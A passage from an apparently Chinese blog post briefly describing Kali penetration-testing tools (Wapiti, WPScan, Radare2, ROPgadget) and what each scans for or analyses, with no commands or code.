可执行文件,从而逃避常见防病毒产品的检测。wapitiWapiti是一款Web应用扫描工具,可以执行黑盒扫描,用户只需要输入要扫描的网址即可,该工具可以探测文件包含、数据库注入、XSS、CRLF、XXE注入、.htaccess绕过等漏洞,还可以指定报告文件格式等。wpscanWPScan是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题,还使用了 Nikto,它是一款非常棒的Web 服务器评估工具,我们认为这个工具应该成为所有针对 WordPress网站进行的渗透测试的一部分。radare2Radare2是一个开源的命令行反汇编框架和逆向工程工具,支持多种架构和文件格式,可以用来对二进制文件进行静态和动态分析,包括反汇编、调试、数据可视化等操作等,跟IDA和x64dbg差不多,最主要的是kali自带,用起来感觉还可以。r2 pwnROPgadgetROPgadget 是一款强大的工具,专为在二进制文件中寻找Gadget而设计。它不仅是一个便捷的查找工具,也能自动化执行相关操作,极大地方便了研究人员在进行返回导向编程(ROP)攻击时的利用过程。ROPgadget 支持多种处理器架构,包括 x86、x64、ARM、PowerPC、SPARC 和 MIPS,同时兼容 ELF、PE 和 Mach-O 三种主流的文件格式。
2022年09月20日
983 阅读
0 评论
76 点赞
0:00